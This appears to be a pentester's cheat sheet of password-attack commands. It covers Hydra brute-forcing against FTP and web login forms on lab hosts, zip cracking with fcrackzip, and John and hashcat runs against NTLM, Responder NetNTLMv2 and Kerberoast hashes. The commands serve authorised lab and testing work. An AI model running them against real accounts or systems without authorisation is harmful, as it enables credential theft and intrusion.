password-cracking
PASSWORD-CRACKING findmyhash LM -h AAD3B435B51404EEAAD3B435B51404EE <----example ^ ^^^^^^ Type of hashHash itself
Hydra
hydra -L /usr/share/nmap/nselib/data/usernames.lst -P /usr/share/nmap/nselib/data/passwords.lst -u -e s -s 25 192.168.0.15 ftp
username list password list params IP address service Hydra against a post request on a website. http-post-form is because it's a post request ^USER^ and ^PASS^ are the variables in the post request - Incorrect username is a string that comes into play when you incorrectly login. - the colon separates the parameters
hydra -l admin -P darkweb2017-top10K.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
Hydra Post on a forum
hydra -l harvey -P /usr/share/wordlists/rockyou.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=login:Invalid Username or Password"
To crack a locked zip file
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.tar.bz2.zip <--crack a zip file
wordlist filenow, you can unzip the file with the following "if the password is found"
unzip -P
*example unzip -P aaaaaa backup.tar.bz2.zip
now you can unzip the file
tar -xjf
John Stand Alone Cracker
john --wordlist /usr/share/wordlists/rockyou.txt
Responder
hashcat32.exe -m 5600 "F:\kali-stuff\Steve_Hashes.txt" "F:\kali-stuff\18_in_1.lst" -r "F:\kali-stuff\NSAKEYv2.rule" -O -w 3 -a 0
hashcat64.exe -m 5600 "F:\kali-stuff\rules\netntlm-hashes.txt" "F:\kali-stuff\test" -r fuckyou.rule --speed-only --net-ntlmv2 AKA responder hashes
Kerberoast
hashcat32.exe -m 13100 -d 1 -w 4 -a 0 "F:\kali-stuff\pewpewinteresting.txt" "F:\kali-stuff\18_in_1.lst" -r "F:\kali-stuff\NSAKEYv2.rule" -O
hashcat32.exe -m 1000 "F:\kali-stuff\Steve_Hashes.txt" "F:\kali-stuff\18_in_1.lst" -r "F:\kali-stuff\NSAKEYv2.rule" -O -w 3 -a 0
Last updated
Was this helpful?